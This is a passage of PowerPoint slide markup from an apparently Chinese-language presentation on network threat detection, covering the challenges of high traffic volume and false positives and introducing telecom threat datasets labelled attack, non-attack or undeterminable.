              <a:latin typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:sym typeface="微软雅黑"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="文本框 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId16"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5899785" y="1057910"/>
            <a:ext cx="1887220" cy="353060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" bIns="0" rtlCol="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="300">
                <a:solidFill>
                  <a:srgbClr val="636190"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
              </a:rPr>
              <a:t>庞大数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="300">
                <a:solidFill>
                  <a:srgbClr val="636190"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
              </a:rPr>
              <a:t>流</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="300">
              <a:solidFill>
                <a:srgbClr val="636190"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
              <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="文本框 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId17"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5899785" y="1457960"/>
            <a:ext cx="1769745" cy="1570355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" spc="150">
                <a:solidFill>
                  <a:srgbClr val="9F92B0"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:sym typeface="微软雅黑"/>
              </a:rPr>
              <a:t>网络流量的大规模和高速增长使得检测系统需要处理庞大的数据流，要求威胁检测具备高吞吐量和低延迟。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" spc="150">
              <a:solidFill>
                <a:srgbClr val="9F92B0"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:sym typeface="微软雅黑"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="文本框 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7989570" y="2512695"/>
            <a:ext cx="1887220" cy="353060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" bIns="0" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="300">
                <a:solidFill>
                  <a:srgbClr val="636190"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
              </a:rPr>
              <a:t>误报率➡️</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="300">
                <a:solidFill>
                  <a:srgbClr val="636190"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
              </a:rPr>
              <a:t>效率</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="300">
              <a:solidFill>
                <a:srgbClr val="636190"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
              <a:ea typeface="思源黑体 CN Bold" panose="020B0800000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="文本框 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId19"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7989570" y="2912745"/>
            <a:ext cx="1769745" cy="1570355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" spc="150">
                <a:solidFill>
                  <a:srgbClr val="9F92B0"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
                <a:sym typeface="微软雅黑"/>
              </a:rPr>
              <a:t>由于网络流量的复杂性，威胁检测系统往往面临误报问题，即将正常行为错误地标记为威胁，这可能导致安全团队的不必要干预。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" spc="150">
              <a:solidFill>
                <a:srgbClr val="9F92B0"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:ea typeface="思源黑体 CN Regular" panose="020B0500000000000000" charset="-122"/>
              <a:sym typeface="微软雅黑"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018540" y="836295"/>
            <a:ext cx="675005" cy="4761865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>网络检测系统面临的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>挑战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"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3041015"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实验数据集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1165860" y="1569720"/>
            <a:ext cx="9342755" cy="4975860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>本实验使用了两份电信网络威胁数据集，其中包含的特征如下图所示：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="宋体" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>其中，‘研判’ 为数据标签列，包含的标签有：攻击、非攻击、无法判定。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="宋体" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165860" y="2205990"/>
            <a:ext cx="8879205" cy="3548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3041015"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实验数据集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6" descr="7b0a202020202274657874626f78223a20227b5c2269645c223a32303334323131302c5c2263617465676f72795f69645c223a5c225c227d220a7d0a"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="858099" y="1770484"/>
            <a:ext cx="4713318" cy="4569687"/>
            <a:chOff x="5898" y="3936"/>
            <a:chExt cx="7423" cy="3216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="140" name="图形 138"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5898" y="3936"/>
              <a:ext cx="7423" cy="3216"/>
              <a:chOff x="3745737" y="2499168"/>
              <a:chExt cx="4713367" cy="2042032"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="141" name="图形 138"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3843343" y="2601912"/>
                <a:ext cx="4615761" cy="1939288"/>
                <a:chOff x="3843343" y="2601912"/>
                <a:chExt cx="4615761" cy="1939288"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="142" name="任意多边形: 形状 141"/>
                <p:cNvSpPr/>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId2"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3849765" y="2608334"/>
                  <a:ext cx="4602918" cy="1926445"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 4602918"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 1926445"/>
                    <a:gd name="connsiteX1" fmla="*/ 4602919 w 4602918"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 1926445"/>
                    <a:gd name="connsiteX2" fmla="*/ 4602919 w 4602918"/>
                    <a:gd name="connsiteY2" fmla="*/ 1926446 h 1926445"/>
                    <a:gd name="connsiteX3" fmla="*/ 0 w 4602918"/>
                    <a:gd name="connsiteY3" fmla="*/ 1926446 h 1926445"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="connsiteX0" y="connsiteY0"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="connsiteX1" y="connsiteY1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="connsiteX2" y="connsiteY2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="connsiteX3" y="connsiteY3"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="4602918" h="1926445">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="1926446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1926446"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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形状 142"/>
                <p:cNvSpPr/>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3843343" y="2601912"/>
                  <a:ext cx="4615761" cy="1939288"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 4615762 w 4615761"/>
                    <a:gd name="connsiteY0" fmla="*/ 1939289 h 1939288"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 4615761"/>
                    <a:gd name="connsiteY1" fmla="*/ 1939289 h 1939288"/>
                    <a:gd name="connsiteX2" fmla="*/ 0 w 4615761"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 1939288"/>
                    <a:gd name="connsiteX3" fmla="*/ 4615762 w 4615761"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 1939288"/>
                    <a:gd name="connsiteX4" fmla="*/ 4615762 w 4615761"/>
                    <a:gd name="connsiteY4" fmla="*/ 1939289 h 1939288"/>
                    <a:gd name="connsiteX5" fmla="*/ 12843 w 4615761"/>
                    <a:gd name="connsiteY5" fmla="*/ 1926446 h 1939288"/>
                    <a:gd name="connsiteX6" fmla="*/ 4602919 w 4615761"/>
                    <a:gd name="connsiteY6" fmla="*/ 1926446 h 1939288"/>
                    <a:gd name="connsiteX7" fmla="*/ 4602919 w 4615761"/>
                    <a:gd name="connsiteY7" fmla="*/ 12843 h 1939288"/>
                    <a:gd name="connsiteX8" fmla="*/ 12843 w 4615761"/>
                    <a:gd name="connsiteY8" fmla="*/ 12843 h 1939288"/>
                    <a:gd name="connsiteX9" fmla="*/ 12843 w 4615761"/>
                    <a:gd name="connsiteY9" fmla="*/ 1926446 h 193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5761" h="1939288">
                      <a:moveTo>
                        <a:pt x="4615762" y="1939289"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1939289"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4615762" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4615762" y="1939289"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="12843" y="1926446"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="1926446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="12843"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12843" y="12843"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12843" y="1926446"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="231815"/>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44" name="图形 138"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3798393" y="2556962"/>
                <a:ext cx="4615761" cy="1939288"/>
                <a:chOff x="3798393" y="2556962"/>
                <a:chExt cx="4615761" cy="1939288"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="145" name="任意多边形: 形状 144"/>
                <p:cNvSpPr/>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId4"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3804815" y="2563383"/>
                  <a:ext cx="4602918" cy="1926445"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 4602918"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 1926445"/>
                    <a:gd name="connsiteX1" fmla="*/ 4602919 w 4602918"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 1926445"/>
                    <a:gd name="connsiteX2" fmla="*/ 4602919 w 4602918"/>
                    <a:gd name="connsiteY2" fmla="*/ 1926446 h 1926445"/>
                    <a:gd name="connsiteX3" fmla="*/ 0 w 4602918"/>
                    <a:gd name="connsiteY3" fmla="*/ 1926446 h 1926445"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="connsiteX0" y="connsiteY0"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="connsiteX1" y="connsiteY1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="connsiteX2" y="connsiteY2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="connsiteX3" y="connsiteY3"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="4602918" h="1926445">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="1926446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1926446"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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形状 145"/>
                <p:cNvSpPr/>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId5"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3798393" y="2556962"/>
                  <a:ext cx="4615761" cy="1939288"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 4615762 w 4615761"/>
                    <a:gd name="connsiteY0" fmla="*/ 1939289 h 1939288"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 4615761"/>
                    <a:gd name="connsiteY1" fmla="*/ 1939289 h 1939288"/>
                    <a:gd name="connsiteX2" fmla="*/ 0 w 4615761"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 1939288"/>
                    <a:gd name="connsiteX3" fmla="*/ 4615762 w 4615761"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 1939288"/>
                    <a:gd name="connsiteX4" fmla="*/ 4615762 w 4615761"/>
                    <a:gd name="connsiteY4" fmla="*/ 1939289 h 1939288"/>
                    <a:gd name="connsiteX5" fmla="*/ 12843 w 4615761"/>
                    <a:gd name="connsiteY5" fmla="*/ 1926446 h 1939288"/>
                    <a:gd name="connsiteX6" fmla="*/ 4602919 w 4615761"/>
                    <a:gd name="connsiteY6" fmla="*/ 1926446 h 1939288"/>
                    <a:gd name="connsiteX7" fmla="*/ 4602919 w 4615761"/>
                    <a:gd name="connsiteY7" fmla="*/ 12843 h 1939288"/>
                    <a:gd name="connsiteX8" fmla="*/ 12843 w 4615761"/>
                    <a:gd name="connsiteY8" fmla="*/ 12843 h 1939288"/>
                    <a:gd name="connsiteX9" fmla="*/ 12843 w 4615761"/>
                    <a:gd name="connsiteY9" fmla="*/ 1926446 h 193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5761" h="1939288">
                      <a:moveTo>
                        <a:pt x="4615762" y="1939289"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1939289"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4615762" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4615762" y="1939289"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="12843" y="1926446"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="1926446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="12843"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12843" y="12843"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12843" y="1926446"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="231815"/>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48" name="任意多边形: 形状 147"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId6"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3745737" y="2499168"/>
                <a:ext cx="4602918" cy="1926445"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 4602918"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 1926445"/>
                  <a:gd name="connsiteX1" fmla="*/ 4602919 w 4602918"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 1926445"/>
                  <a:gd name="connsiteX2" fmla="*/ 4602919 w 4602918"/>
                  <a:gd name="connsiteY2" fmla="*/ 1926446 h 1926445"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 4602918"/>
                  <a:gd name="connsiteY3" fmla="*/ 1926446 h 1926445"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX3" y="connsiteY3"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4602918" h="1926445">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4602919" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4602919" y="1926446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1926446"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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8" name="文本框 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
